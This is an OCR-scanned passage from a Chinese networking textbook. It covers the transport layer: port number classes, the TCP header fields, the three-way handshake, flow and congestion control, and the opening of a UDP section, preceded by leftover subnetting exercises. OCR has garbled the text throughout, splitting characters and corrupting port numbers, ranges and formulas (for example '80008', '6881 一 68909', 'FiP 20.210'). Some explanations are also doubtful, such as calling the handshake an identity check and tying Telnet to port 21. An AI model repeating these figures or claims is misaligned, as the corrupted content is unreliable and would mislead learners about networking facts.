2. 简 述 静态 路 由 算法 和 动态 路 由 算法 的 区 别 。 
3. 简 述 路 由 器 工作 原理 。 
4. 简 述 子 网 划分 的 目的 和 意义 。 
四 、 计算 题 


将 192. 168. 22. 0 网 络 划分 为 10 个 子 网 , 若 IP 地 址 为 192. 168. 22. 51, 求 该 IP 地 址 的 
地 址 类 型 . 子 网 掩 码 . 子 网 地 址 .主机 号 . 子 网 广播 地 址 。 


(1) 子 网 掩 码 : 

(2) 子 网 地 址 : 

(3) 子 网 广播 地 址 : 

(4) 192. 168. 22. 77 处 于 192. 168. 22. 0 网 络 中 第 子 网 第 
主机 。 
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在 OSI 参考 模型 中 ,物理 层 ,数据 链 路 层 和 网 络 层 被 称 为 低 三 层 , 与 通信 相关 ; 应 用 层 、 
表示 层 和 会 话 层 被 称 为 高 三 层 ,与 操作 系统 和 应 用 程序 相关 ; 传输 层 位 于 OSI 参考 模型 的 
第 四 层 , 是 高 三 层 与 低 三 层 的 接口 层 , 既 涉及 具体 应 用 ,又 与 网 络 通信 相关 ,因此 传输 层 也 称 
为 中 间 层 或 者 过 渡 层 。 

传输 层 基于 网 络 层 服务 。 网 络 层 通过 寻 址 实现 源 主机 和 目的 主机 之 间 的 连接 ,交付 传 
输 层 。 传 输 层 通 过 端口 号 标识 不 同 应 用 进程 9, 当 将 来 自 网 络 层 数 据 包 排序 组 合成 完整 报 
文 后 ,再 根据 端口 号 转送 至 相应 的 应 用 进程 。 也 就 是 说 ,网 络 层 实现 双方 主机 的 连接 ,而 传 
输 层 在 网 络 层 基础 上 实现 双方 主机 应 用 进程 之 间 的 连接 , 即 端 到 端 连接 。 

本 章 重 点 讲述 传输 层 的 TCP 和 UDP 协议 ,要 求 读者 识 记 基本 服务 端口 号 ,了 解 TCP 

:次 握手 过 程 ,掌握 TCP 和 UDP 报 文 格式 ,最 后 深化 面向 连接 服务 和 无 连接 服务 之 间 的 区 
别 和 应 用 。 

(1) 识 记 传输 层 功能 和 作用 。 

(2) 理解 TCP 协议 和 UDP 协议 的 区 别 和 应 用 。 

(3) 识 记 TCP 报 文 格式 。 

(4) 识 记 端 口号 的 作用 和 分 类 。 

(5) 理解 TCP 三 次 握手 过 程 。 


6.1 传输 层 基本 功能 


6.1.1 传输 层 功 能 


严格 来 讲 , 两 个 远程 主机 之 间 的 通信 实际 上 是 两 主机 应 用 进程 之 间 的 通信 。 网 络 层 基 
于 IP 协议 将 数据 包 传送 至 目的 主机 ,但 数据 包 仅 停留 在 目的 主机 的 网 络 层 , 并 没有 交付 到 
相应 进程 ,剩余 任务 需要 由 传输 层 来 进一步 完成 。 例 如 ,网 络 层 只 能 将 一 封 信 送 至 对 方 家 门 
口 ,而 只 有 传输 层 才能 真正 把 信件 送 到 收 件 人 手中 。 传 输 层 基于 网 络 层 服务 ,任务 是 向 应 用 
进程 提供 可 靠 \ 有 效 的 端 到 端 服务 。 为 达 此 目的 ,传输 层 的 具体 功能 如 下 。 

1. 建立 双方 进程 之 间 的 逻辑 连接 

传输 层 的 逻辑 连接 是 收发 双方 应 用 进程 与 应 用 进程 之 间 的 连接 。 一 个 主机 内 部 可 以 同 


@ ”进程 是 应 用 程序 的 一 次 执行 ,例如 每 个 IE 浏览 器 窗口 都 是 一 个 不 同 的 进程 实例 。 进 程 之 间 互 不 相干 ,通过 不 同 
号 


端口 号 标识 。 
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时 运行 多 个 应 用 进程 ,例如 ,同时 打开 多 个 浏览 器 页 面 、 发 送 电子 邮件 、 网 络 聊天 等 ,各 应 用 
进程 相互 独立 ,用 源 端 口号 (49152 一 65535) 作 为 标识 。 当 加 上 端口 号 后 ,传输 层 选择 TCP 
传输 控制 协议 或 UDP 用 户 数据 报 协议 为 双方 应 用 程序 建立 逻辑 连接 。 

TCP 传输 控制 协议 是 一 个 可 靠 的 、 面 向 连接 协议 。 它 允许 两 主机 之 间 无 差错 的 传输 数 
据 , 另 外 还 负责 对 数据 段 报 文 进行 流量 控制 ,避免 因 发 送 过 快 所 导致 的 数据 丢失 和 网 络 
拥塞 。 

UDP 用 户 数 据 报 协 议 采 用 无 连接 方式 传输 数据 ,不 能 保证 数据 一 定 能 抵达 接收 方 ,只 
是 尽 最 大 努力 投递 。 也 就 是 说 ,UDP 用 户 数据 报 协 议 不 关心 数据 能 否 抵达 目的 主机 、 数 据 
是 否 出 错 , 其 可 靠 性 通过 其 他 层 协议 弥补 。 

2. 报 文 分 段 和 重组 

应 用 进程 接收 来 自 客户 端 请 求 ,将 信息 通过 表示 层 和 会 话 层 转换 为 数据 后 交 由 传输 层 。 
转换 的 数据 过 长 并 不 利于 传输 ,传输 层 需要 将 数据 拆 解 成 更 小 分 段 以 便 传送 。 为 标明 分 段 
信息 ,传输 层 在 每 个 分 段 前 面 添加 报头 ,包含 源 端口 号 .目的 端口 号 、 分 段 长 度 、 校 验 和 有 @ 
等 控制 信息 。 由 于 各 个 数据 段 打包 后 会 沿 不 同 路 径 抵 达 接 收 方 , 故 传 输 层 为 每 个 数据 段 标 
上 序列 号 ,在 抵达 目的 节点 后 再 根据 序号 重组 排列 成 初始 报 文 交 付 应 用 进程 。 

3， 差错 控制 (可 选 ) 

差错 控制 是 检测 和 纠正 传输 错误 的 机 制 。 当 数据 链 路 层 没 有 对 数据 帧 进行 差错 控制 
时 , 检 错 任务 可 由 网 络 层 负责 ; 当 网 络 层 也 没有 对 数据 包 进 行 差 错 控制 时 , 检 错 任务 可 由 传 
输 层 或 应 用 层 负责 。 假 如 所 有 层次 都 不 对 数据 进行 差错 控制 ,用 户 收 到 的 数据 可 能 会 产生 
差错 ,如 文字 乱码 ,图 像 无 法 预览 ,压缩 文件 无 法 解压 等 。 

4. 流量 控制 和 拥塞 控制 (可 选 ) 

传输 层 可 以 对 报 文 分 段 进 行 流量 控制 和 拥塞 控制 ,负责 匹配 收发 双方 速度 ,以 避免 
拥塞 。 流 量 控制 也 可 以 在 数据 链 路 层 或 网 络 层 完成 ,分 别 对 数据 帧 和 数据 包 进 行 流量 
控制 。 

5. 质量 服务 QoS 

仅仅 依靠 流量 控制 和 拥塞 控制 有 时 并 不 能 保证 数据 服务 质量 (Quality of Service)。 


范畴 。 网 络 服务 质量 优 劣 可 以 用 以 下 参数 进行 衡量 ,分 别 是 可 靠 性 .时 延 . 时 延 抖动 9 和 
带宽 。 


6.1.2 传输 层 端口 号 
端口 被 形象 地 称 为 计算 机 与 外 界 通信 的 窗口 。TCP 和 UDP 协议 使 用 端口 号 标识 应 用 


@ 源 端 口号 用 于 标识 发 送 方 应 用 程序 ,例如 ,同时 打开 多 个 浏览 器 页 面 ,每 个 浏览 器 都 会 随机 分 配 一 个 介 于 49152 一 
65535 之 间 的 源 端 口号 。 

回 目的 端口 号 用 于 指明 将 数据 发 送 至 目的 主机 的 相应 进程 。 

回 ” 校 验 和 是 一 种 检测 数据 传输 错误 的 差错 机 制 , 将 数据 二 进 制 反 码 求 和 后 生成 校 验 位 随 数据 一 起 发 送 ,在 目的 节 
点 接收 到 数据 后 做 相同 计算 ,并 结合 校 验 位 判断 数据 是 否 出 错 。 

图 时 延 抖动 是 由 于 数据 传输 速率 不 稳定 造成 的 。 对 文件 传输 来 讲 ,速率 抖动 大 小 无 关 要 紧 , 但 是 对 视频 音频 来 
讲 ,速率 拌 动 太 大 会 导致 播放 不 流畅 。 
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进程 ,端口 号 可 以 看 成 是 对 各 种 应 用 进程 的 编号 ,是 一 个 逻辑 概念 ,与 交换 机 和 路 由 器 中 的 
物理 端口 是 两 个 概念 。 

端口 号 用 16 位 二 进 制 数 标识 ,共有 0 一 65535 个 端口 号 。IANA 号 码 指派 委员 会 根据 
端口 号 应 用 范围 将 端口 分 为 3 类 。 

1，Well-Known Ports 熟知 端口 (0 一 1023) 

熟知 端口 也 叫 作 公认 端口 或 常用 端口 ,由 TCP/IP 确定 和 公布 ,是 所 有 用 户 和 操作 系统 
达成 共识 的 。 熟 知 端口 已 固定 分 配给 系统 服务 ,不 能 更 改 。 例 如 ,21 端口 分 配给 FTP 文件 
传输 服务 .25 端口 分 配给 SMTP 简单 邮件 传输 服务 、80 端口 分 配给 HTTP 服务 等 。 熟 知 
端口 号 见 表 6-1。 


表 6-1 熟知 端口 号 


服务 类 型 端口 号 服务 类 型 端口 号 
Echo 7 DHCPr 67 
FiP 20.210 Telnet 23 
SMTP 25 Time 37 
Whois 43 DNS 53 
开 人 TP 80 POP3 110 


2，Registered Ports 注册 端口 (1024 一 49151) 

注册 端口 用 于 分 配给 用 户 进 程 和 应 用 程序 ,也 常常 被 病毒 木马 利用 。 当 软件 商 发 布 网 
络 软 件 时 ,端口 号 不 能 占用 系统 熟知 端口 ,也 不 能 与 其 他 软件 端口 号 冲突 ,必须 向 IANA 申 
请 注册 端口 。 例 如 QQ 端口 号 为 4000 和 80008, 迅 雷 端口 号 为 3077 和 3076 ,BT 端口 号 为 
6881 一 68909。 哪 个 进程 使 用 哪个 端口 号 并 不 重要 ,用 户 也 可 以 修改 ,但 必须 达成 共识 。 例 
如 个 人 修改 迅雷 端口 号 会 导致 无 法 正常 下 载 ,因为 无 法 接 人 服务 器 ,也 无 法 与 其 他 迅雷 用 户 
交换 数据 。 常 用 软件 的 注册 端口 见 表 6-2 。 

表 6-2 常用 软件 的 注册 端口 


服务 类 型 端口 号 服务 类 型 端口 号 
QQ 4000 .8000 MSN 1863 
NetMeeting 1720、1731 Windows 远程 桌面 3389 
MYSQL 3306 SQL 1433 
eMule 电驴 4661 一 4666 BT( 网 际 快车 ) 4041 
迅雷 3077、3076 纳米 机 器 人 4622 
六 见 木马 6267( 广 外 女生 ).7300 一 7308( 网 络 精灵 )、1027( 灰 镜子 ) .8102( 网 络 神偷 ) 、 
7626( 冰 河 木 马 )、2001( 黑 洞 木马 ) 、7306(Netspy) ,4950 (lcqTrojan) 


外 ”FTP 服务 控制 端口 (连接 端口 ) 号 是 21, 数 据 端口 号 为 20。 

加 QQ 程序 使 用 UDP 用 户 数据 报 协 议 传输 消息 ,默认 通信 端口 ( 源 端口 ) 号 为 4000, 服 务 端 口 (目的 端口 ) 号 为 
8000。 若 打开 第 二 个 QQ, 则 源 端口 号 变 为 4001, 目 的 端口 号 不 变 ,打开 3 个 以 上 QQ 进程 端口 号 如 此 类 推 。 如 果 网 络 管 
理 员 要 禁用 QQ, 则 只 需 在 网 关上 配置 过 滤 规 则 ,过 滤 目 的 端口 号 为 8000 的 UDP 数据 包 就 可 以 实现 对 QQ 的 封杀 。 

@ BT 软件 通过 用 户 之 间 彼 此 共享 数据 源 实现 加 速 下 载 , 但 同时 也 占用 大 量 带宽 。 默 认 每 个 BT 下 载 线程 占用 一 
个 端口 ,最 多 开启 9 个 线程 。 下 载 线程 数 可 以 修改 ,但 分 配 过 多 会 占 尽 网 络 带宽 ,影响 他 人 网 速 。 
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3. Dynamic Ports 动态 端口 (49152 一 65535) 

动态 端口 也 称 为 临时 端口 ,IANA 既 不 做 特别 规定 也 不 必 注 册 ,动态 分 配给 应 用 进程 使 
用 。 当 一 个 应 用 进程 需要 通信 时 , 它 向 操作 系统 申请 一 个 动态 端口 作为 源 端 口 ,用 于 标识 进 
程 本 身 。 当 进程 关闭 后 ,系统 释放 其 占用 的 端口 号 以 分 配给 下 一 个 需要 通信 的 进程 。 


6.2 TCP 传输 控制 协议 


6.2.1 TCP 协议 与 应 用 


TCP(Transmission Control Protocol) 传输 控制 协议 工作 于 传输 层 ,提供 面向 连接 的 可 
靠 传输 服务 。TCP 协议 应 用 广泛 ,适合 传输 大 量 的 .可 靠 性 和 实时 性 要 求 较 高 的 数据 ,如 远 
程控 制 、 网 页 浏览 .网 络 电话 等 。 表 6-3 给 出 常用 TCP 端口 号 及 应 用 。 
表 6-3 常用 CP 端口 号 及 应 用 


TCP 端口 号 协 议 说 明 
20.21 FTP 文件 传输 协议 ,用 于 文件 上 传 和 下 载 
23 Telnet 远程 登录 协议 ,通过 登录 21 端口 远程 管理 计算 机 
25 SMTP 简单 邮件 传输 协议 ,用 于 发 送 邮件 
53 DNS 域名 服务 ,用 于 将 域名 如 www. 163. com 解析 成 IP 地 址 
80 HTTP 超 文本 传输 协议 ,用 于 网 页 浏览 


6.2.2 TCP 数据 段 格式 


为 保证 数据 传输 可 靠 有 效 ,TCP 数据 段 报头 含有 复杂 重要 信息 ,图 6-1 给 出 TCP 报 文 
格式 ,下 面 是 详细 介绍 。 


0 16 31 
源 端口 (16bit) | 目的 端口 (16bit) 
序号 (32bit) 
确认 号 (32bit) 
HLEN| 保留 IVIAIPIRISIF 有 首部 
Gabi) | (Gi |8IEIBIEININ 人 
校 验 和 (16b) 紧急 指针 (16bit) 
选项 与 填充 (和 40B) 
数据 (必须 填充 成 16bit 的 整数 倍 ) 


TCP 段 格式 
图 6-1 TCP 报 文 格式 
1. 源 端口 号 
0 一 15 位 共 16bit 存放 源 端 口号 ,是 操作 系统 为 需要 通信 的 应 用 进程 分 配 的 随机 端口 
号 ,用 于 唯一 标识 一 个 进程 。 
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2. 目的 端口 号 

16 一 31 位 共 16bit 存放 目的 端口 号 ,对 应 于 目的 节点 应 用 进程 的 监听 端口 。 接 收 方 传 
输 层 收 到 报 文 后 根据 目的 端口 号 决定 转发 至 相应 进程 。 

3. 序列 号 

第 2 行 是 32 位 序列 号 ,提供 0 一 2” 一 1 数字 序号 。 为 了 便于 传输 ,TCP 从 应 用 进程 接 
收 数据 后 会 拆 分 成 长 度 更 小 的 数据 段 。TCP 利用 序列 号 将 数据 段 打上 标签 ; 当 抵达 目的 
节点 后 ,再 根据 序列 号 重组 排列 成 初始 报 文 交付 应 用 进程 。 

4. 确认 号 

数据 段 虽 然 贴 上 标签 ,但 并 不 保证 所 有 数据 段 都 能 抵达 目的 节点 ,只 要 任何 一 个 数据 段 
丢失 都 会 破坏 数据 完整 性 ,而 使 用 确认 号 可 以 很 好 解决 这 个 问题 。 第 3 行 32 位 确认 号 同样 
提供 0 一 2” 一 1 个 序号 ,用 于 确认 数据 段 是 否 发 送 成 功 。 例 如 ,发 送 方 接收 到 确认 号 为 X， 
表示 前 X 一 1 个 数据 段 已 成 功 接收 ; 如 果 数 据 段 一 直 没 被 确认 直到 超时 ,发送 方 会 重新 发 
送 丢 失 数据 段 , 从 而 保证 数据 完整 性 。 

5. 首部 长 度 (HLEN) 

第 4 行 前 4 个 比特 用 于 标识 报头 字 节 长 度 , 取 值 为 5 一 15 ,默认 值 为 5, 表 示 默 认 情 况 下 
TCP 报头 长 度 为 20 个 字 节 ?。 当 要 扩展 首部 长 度 时 ,可 以 更 改 这 个 字段 ,例如 ,首部 长 度 的 
4 位 都 置 “1”,TCP 首部 长 度 最 大 为 60 个 字 节 @。 


6. 保留 长 度 
保留 长 度 6 位 作为 今后 扩展 使 用 ,目前 尚未 使 用 ,全 部 定义 为 "0”。 
7. 6 个 控制 位 


6 个 控制 位 CURG、ACK、PSH RST、SYN FIN) 对 TCP 链 路 建立 起 到 重要 作用 ,具体 
含义 如 下 。 

(1) URGCURGENT ,紧急 的 ) 紧 急 指针 有 效 位 

当 紧急 指针 URG=0 时 ,不 起 作用 ; 当 紧 急 指 针 URG=1 时 ,表示 报 文 含有 紧急 数据 ， 
应 优先 插入 报 文 段 最 前 列 , 同 时 告诉 接收 方 将 有 紧急 数据 到 来 ,要 求 立即 接收 处 理 。 所 谓 紧 
急 数据 ,包括 程序 错误 .数据 重复 丢失 .丢失 补足 等 ,必须 与 第 5 行 后 16 位 紧急 指针 配合 使 
用 ,使 接收 方 知道 紧急 数据 长 度 有 多 少 字 节 。 

(2) ACK(Acknowledgement Number) 确认 编号 

确认 编号 是 对 第 3 行 32 位 确认 号 的 确认 。 当 ACK==1 时 ,确认 序列 号 字段 才 有 效 ; 当 
ACK==0 时 ,确认 号 无 效 。 

(3) PSHCPUSH) 推 操作 

当 PSH=1 时 ,要 求 接收 方 尽 快 将 本 数据 段 推送 至 应 用 层 , 以 加 快 特殊 数据 段 处 理 速 
度 。PSH 比 紧急 指针 更 加 有 效 ,但 很 少 使 用 。 

(4) RST(RESET) 复 位 操作 

当 RST==1 时 ,通知 接收 方 重新 建立 TCP 连接 。 当 主机 出 现 故 障 时 ,必须 释放 连接 , 同 


@” 当 首部 长 度 为 默认 值 5 时 ,表示 报头 长 度 为 5 行 ,而 每 行 数据 有 32 位 即 4 个 字 节 ,所 以 报头 长 度 为 5X4 一 20 个 
加 当 4 位 首部 长 度 为 "1111" 时 , 转 为 十 进 制 是 "15”, 表 示 首 部 长 度 为 15 行 ,每 行 4 个 字 节 ,所 以 首部 长 度 为 15X 4 一 
60 个 字 节 。 
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时 告知 接收 方 重新 建立 连接 。 

(5) SYN(Synchronize Sequence Numbers) 同 步 序 列 编号 

SYN 用 于 建立 连接 请 求 并 使 序号 同步 。 当 接收 方 SYN 二 1 时 ,表示 同意 建立 连接 。 

(6) FIN(FINAL) 终 值 位 

当 TCP 完成 数据 传输 需要 断 开 连 接 时 ,提出 断 开 连 接 的 一 方 将 FIN 置 1。 

8. 窗口 大 小 

16 位 窗口 大 小 用 于 告知 接收 方 发 送 窗 口 大 小 ,其 值 等 于 链 路 中 存在 的 数据 段 数 。 通 过 
设置 窗口 大 小 ,接收 方 可 以 控制 发 送 方 发 送 速 率 实现 流量 控制 。 当 网 络 通畅 时 ,可 通过 加 大 
窗口 值 加 快 发 送 速度 ; 当 网 络 不 稳定 时 ,可 减 小 窗口 值 减 慢 发 送 速度 以 保证 正常 接收 。 
TCP 传输 控制 协议 中 的 流量 控制 就 是 基于 改变 窗口 大 小 来 实现 的 ,具体 参阅 以 上 章节 。 

9. 校 验 和 

第 5 行 前 16 位 校 验 和 用 于 对 数据 段 进行 差错 控制 。 在 发 送 数据 段 时 ,由 发 送 方 计算 
TCP 数据 段 所 有 字 节 的 校 验 和 ,接收 方 收 到 后 再 做 相同 计算 生成 校 验 和 ,车 两 者 一 致 则 表 
示 数 据 检 验 无 误 ,否则 丢弃 数据 段 等 待 重 发 。 

10. 可 选项 

可 选项 只 有 当 首 部 长 度 大 于 20B 时 才 有 效 , 此 时 TCP 报头 会 附加 更 多 信息 ,一 般 情 况 
下 没有 可 选项 。 

11. 数据 

数据 是 传输 层 分 段 后 的 数据 。 当 所 有 数据 段 抵达 接收 方 后 ,再 根据 报头 32 个 序列 号 重 
组 排序 ,还原 成 初始 报 文 交 由 目的 进程 。 


6.2.3 ”TCP 三 次 握手 


由 于 局 域 网 主机 共享 公共 IP 接 入 Internet, 因 此 网 络 中 的 计算 机 不 能 简单 通过 IP 地 址 
作为 身份 标识 。 在 建立 连接 前 两 主机 互 不 认识 ,无 法 进行 数据 传输 ,需要 “握手 "相互 确认 身 
份 ,就 像 日 常生 活 中 陌生 人 通过 握手 彼此 认识 后 才能 进行 交谈 。 把 网 络 中 的 计算 机 确认 对 
方 身份 的 过 程 形象 地 称 为 "三 次 握手 ”。 

TCP 传输 控制 协议 是 面向 连接 协议 。 所 谓 面向 连接 ,是 指数 据 在 发 送 之 前 需要 通过 
“三 次 握手 "形式 建立 逻辑 链 路 ,所 有 数据 段 按 * 先 进 先 出 原则 以 类 似 管道 形式 通 往 目的 节 
点 ,存在 建立 链 路 、 维 持 链 路 和 释放 链 路 3 个 过 程 。 也 就 是 说 ,TCP 连接 的 建立 是 通过 “三 
次 握手 "实现 的 ,只 有 “三 次 握手 "完成 后 逻辑 链 路 才 得 以 建立 ,数据 才 得 以 传输 。 网 络 中 计 
算 机 “三 次 握手 ”的 过 程 可 以 归纳 为 一 次 请 求 ,两 次 确认 ”, 如 图 6-2 所 示 。 

(1) 第 一 次 握手 过 程 。 客 户 机 要 登录 服务 器 下 载 数 据 ,首先 发 送 第 一 次 握手 请 求 报 文 
至 服务 器 请 求 建立 连接 。 第 一 个 参数 SYNO= 1 表示 客户 机 请 求 服务 器 与 其 进行 序号 同 
步 , 即 向 服务 器 请 求 建立 连接 ; 第 二 个 参数 SEQ@ 一 X 表示 客户 机 目前 发 送 给 服务 器 的 数 
据 段 序 号 为 X , 则 下 一 次 发 送 给 该 服务 器 序号 为 X 十 1, 再 下 次 为 X 十 2, 以 此 类 推 。 这 里 X 
是 随机 生成 的 ,范围 是 0 一 2 一 1, 约 43 亿 个 数值 。X 相当 于 是 客户 机 给 服务 器 的 身份 标 


@ SYN: Synchronize Sequence Numbers, 同 步 序列 编号 。 
加 SEQ: Sequence Number, 序 列 号 。 
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(DSYN=1, SEQ=X 
第 一 次 握手 : 连接 请 求 报 文 


LA CO) SYN=1, SEQ=7, ACK=X+1 
第 二 手 次 握手 : 确认 报 文 


客户 机 服务 器 
(3) SEQ=X+1, ACK=Y+1 
第 三 手 次 握手 : 确认 报 文 


图 6-2 三 次 握手 过 程 


识 ,因为 可 能 存在 多 个 客户 机 同时 登录 至 服务 器 ,服务 器 通过 不 同 序列 号 区 分 不 同 客 
户 端 ?。 

(2) 第 二 次 握手 过 程 。 若 服务 器 同意 建立 该 连接 , 则 返回 第 二 次 握手 确认 报 文 。 其 中 ， 
SYN=1 表示 服务 器 同意 建立 连接 ; SEQ 二 Y 是 服务 器 给 客户 机 自身 身份 标识 ; ACK®= 
X 十 1 表示 服务 器 确认 客户 机 下 一 次 发 送 过 来 的 数据 段 序号 为 X 十 19, 即 服务 器 确认 客户 
机 身份 。 

(3) 第 三 次 握手 过 程 。 第 三 次 握手 过 程 是 客户 机 确认 服务 器 身份 的 过 程 。SEQ 一 X 十 1 
是 客户 机 发 送 给 服务 器 的 数据 段 编号 ,ACK 二 Y 十 1 表示 客户 机 确认 服务 器 身份 。 

所 谓 三 握手 ,是 双方 主机 对 每 次 发 送 数 据 段 跟踪 、 协 商 和 确认 的 过 程 ,是 数据 段 发 送 和 
接收 同步 的 过 程 , 是 逻辑 链 路 的 建立 过 程 。 在 三 次 握手 完成 后 ,双方 身份 均 被 识别 , 接 下 来 
是 类 似 三 次 握手 的 数据 传输 。 


6.2.4 TCP 流量 控制 


为 解决 收发 双方 速率 匹配 ,避免 因 发 送 过 快 导致 接收 不 及 造成 的 数据 丢失 ,TCP 采用 
滑动 窗口 流量 控制 机 制 ,根据 接收 速率 匹配 发 送 流 量 , 如 图 6-3 所 示 。 

(1) 在 TCP 第 一 次 握手 过 程 中 ,主机 A 向 主机 B 请 求 建立 连接 ,数据 段 随机 字 节 号 为 
100 ,并 宣告 其 最 大 发 送 窗 口 win 二 4, 表 示 最 多 可 连续 发 送 4B 数据 ,接收 方 不 得 以 大 于 4 窗 
口 速率 接收 。 

(2) 在 第 二 次 握手 中 ,主机 B 同意 建立 连接 ,数据 段 以 随机 序号 300 作为 身份 标识 ,并 
确认 主机 A 身份 “*Ack 二 101”, 同 时 宣告 当前 最 大 接收 窗口 win=3, 表 示 发 送 方 不 得 大 于 此 

(3) 在 第 三 次 握手 中 ,当主 机 A 确认 主机 B 身份 “Ack 二 301” 后 ,双方 身份 均 被 识别 , 主 
机 A 开始 发 送 数据 。 

(4) 数据 传输 。 由 于 接收 方 当前 最 大 接收 窗口 为 3, 主 机 A 只 能 发 送 3 个 窗口 数据 ,分 
别 是 第 102、103 和 104 这 3 个 数据 段 。 主 机 B 接收 到 后 ,数据 段 暂 存 于 缓存 之 中 ,由 于 处 理 
性 能 较 弱 , 故 应 用 程序 只 读 取 了 1 个 数据 段 ,为 缓冲 区 腾 出 1 个 窗口 空间 。 

(5) 主机 也 向 主机 A 发 送 确 认 信息 Ack 二 105 ,表示 第 104 之 前 的 数据 段 已 经 接收 , 准 


@ 客户 机 不 能 通过 IP 地 址 来 区 分 不 同 客户 身份 ,因为 局 域 网 中 所 有 主机 通过 共享 公共 IP 与 外 网 连接 ,在 外 网 服 
务 器 看 来 它们 IP 都 是 相同 的 。 

@ ACL: Acknowledgement Number, 确 认 编 号 

加 ”服务 器 接收 到 若干 数据 段 , 若 看 到 序号 为 ~X 十 1” 的 数据 段 即 可 判 为 是 该 客户 发 送 的 。 
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El E 机 A Ea a) 接收 方 的 缓冲 区 
二 SS 
(1) Seq=100,win=4 


-| 
seq=300,Ack=101 Win=3 四 


G) Seq=101,Ack=301,win=3 eR} 
Seq=102,win=4 | |_ 
(9) Seq=103,win=4 | | 国 
Seq=104,win=4 | 
| 到 
Ack=105,win=l (5) 图 “| 
GO Seq=105,win=4 
| 


图 6-3 TCP 流量 控制 


备 接收 第 105 起 的 数据 段 ,并 宣告 当前 最 大 接收 窗口 win 一 1。 

(6) 主机 A 根据 主机 B 宣告 的 接收 速率 调整 流量 , 仅 发 送 第 105 数据 段 了 ,并 同时 宣告 
其 最 大 发 送 窗 口 仍 为 win 一 4。 

TCP 流量 控制 可 以 保证 收发 双方 速率 匹配 和 同步 ,接收 方 可 以 根据 接收 速率 动态 改变 
网 络 流量 。 


6.2.5 TCP 拥塞 控制 


TCP 流量 控制 保证 了 收发 双方 速率 的 匹配 ,避免 接收 方 缓冲 溢出 带 来 的 数据 丢失 问 
题 。 但 是 , 当 网 络 中 存在 拥塞 时 ,实际 数据 流量 由 发 送 方 和 接收 方 的 协商 窗口 及 网 络 拥塞 窗 
口 的 最 小 值 决 定 9, 如 图 6-4 所 示 。 

在 步骤 (1) 至 步骤 (3) 中 ,双方 协商 的 窗口 值 为 3。 

在 步骤 (4) 至 步骤 (5) 中 ,主机 A 向 B 发 送 了 3 个 数据 段 ,分 别 是 102、103 和 104。 然 而 ， 
由 于 网 络 拥塞 ,主机 B 在 周期 内 只 接收 到 第 102 数据 段 , 故 向 主机 A 返回 确认 信息 “Ack= 
103”, 表 示 第 102 之 前 的 数据 段 已 经 接收 ,准备 接收 第 103 起 的 数据 段 , 并 且 当 前 最 大 接收 窗 
口 win 一 3 。 

在 步骤 (6) 中 ,主机 A 接收 到 确认 信息 ,知道 发 送 的 只 有 第 102 数据 段 接收 ,然而 接收 
窗口 win 仍 为 3, 因 此 主机 A 知道 网 络 中 存在 拥塞 @, 将 拥塞 窗口 设置 为 1, 此 时 数据 流量 由 
最 小 值 拥塞 窗口 决定 。 主 机 A 将 发 送 窗 口 调整 为 1 ,重新 发 送 第 103 数据 段 。 

TCP 拥塞 控制 可 以 让 发 送 方 果断 减少 网 络 流量 , 既 可 以 有 效 减少 网 络 拥塞 ,又 可 以 保 
证 数据 完整 无 误 抵达 目的 主机 。 


@@ ”如 果 主 机 B 来 不 及 处 理 缓存 中 数据 ,会 向 A 宣告 其 当前 接收 窗口 win 一 0; 主机 A 接收 到 后 会 立刻 停止 发 送 数 
据 段 ,等 待 B 宣 告 一 个 非 O 接收 窗口 再 继续 发 送 。 

回 ”例如 ,通过 一 根 水 管 向 木 桶 灌水 ,水 龙头 口径 很 大 , 桶 也 很 大 ,但 是 如 果 水 管 比较 细 , 则 灌水 速度 不 能 仅 取决 于 
水 龙头 和 水 桶 ,还 要 看 水 管 流量 。 

加 若 不 存在 硬 塞 , 则 主机 B 接收 窗口 应 为 1 ,表示 因为 数据 处 理 不 及 导致 丢弃 第 103 和 104 数据 段 。 
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El 主机 A 主机 B 到 接收 方 的 缓冲 区 
SS SS 
(1) Seq=100,win=4 1 3 


seq=300,Ack=101 ,win=3 @) 


画 Seq=-101,Ack=301.win-3 3 
Seq=102,win=4 | |_ | 
四 Seq=103,win-4 | 国 | 
Seq=104,win=4 ”| 
| |_ | 
Ack=105win=3 © 
GO Seq=105,win=4 
| 


图 6-4 TCP 拥塞 控制 


6.2.6 TCP 差错 控制 


TCP 差错 控制 能 够 对 数据 段 的 差错 、 丢 失 和 乱 序 进行 控制 ,通过 校 验 和 ,确认 、 超 时 重 
发 3 种 方式 保证 传输 报 文 ?的 完整 无 误 。 

(1) 校 验 和 。 发 送 方 根据 数据 段 字 节 计 算 校 验 和 随 数据 一 起 发 送 ,抵达 目的 节点 后 接 
收 方 做 相同 计算 生成 新 的 校 验 和 , 若 两 者 一 致 则 说 明 数 据 无 误 ,否则 丢弃 该 数据 段 。 

(2) 确认 。 当 接收 方 验 证 数据 无 误 后 ,向 发 送 方 返回 确认 信息 ,表示 该 数据 段 已 接收 正 
确 , 准 备 接收 下 一 数据 段 。 

(3) 超时 重 发 。 当 发 送 方 发 送 一 个 数据 段 后 , 若 在 规定 时 间 内 未 接收 到 目的 节点 返回 
的 确认 信息 , 则 默认 为 数据 段 丢失 或 者 出 错 ,重新 发 送 该 数据 段 。 


6.3 UDP 用 户 数据 报 协议 


用 TCP 协议 传输 数据 可 靠 性 高 ,可 以 对 数据 段 首 部 检 错 ,但 在 传输 前 需要 计算 校 验 和 ， 
需要 三 次 握手 建立 传输 通道 ,这 些 都 会 产生 较 大 延迟 。 从 某 种 意义 上 说 ,TCP 传输 的 可 靠 
性 是 通过 牺牲 传输 性 能 获得 的 ,虽然 可 靠 , 但 在 某 些 场合 下 却 显 得 不 合 时 宜 。 例 如 ,主机 A 
发 送 4B 数据 “你 好 ”@, 若 用 TCP 传输 控制 协议 封装 传输 ,至 少 需要 附加 20B 数据 段 报头 ， 
还 要 为 此 建立 三 次 握手 连接 。 在 传输 小 量 数据 情况 下 ,一 种 简单 高 效 、 忽 略 传输 可 靠 性 @ 的 
协议 应 运 而 生 。 


@ 报 文 由 数据 段 组 成 。 

@ 一 个 英文 字符 占 1B, 一 个 汉字 占 2B。 

@ UDP 用 户 数据 报 协议 是 不 可 靠 协议 ,但 并 不 是 说 用 其 传输 的 数据 不 可 靠 , 而 是 指数 据 段 各 自 寻 址 传输 ,不 敢 保 
证 所 有 数据 段 都 能 抵达 接收 方 .只 是 尽 最 大 努力 投递 。 
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1. UDP 数据 段 格式 

UDP(User Datagram Protocol) 用 户 数据 报 协议 也 是 传输 层 重 要 协议 , 它 采 用 无 连接 方 
式 发 送 数据 ,各 个 数据 段 选择 不 同 路 径 单独 投递 , 当 抵达 目的 节点 后 再 按照 序号 组 合 还 原初 
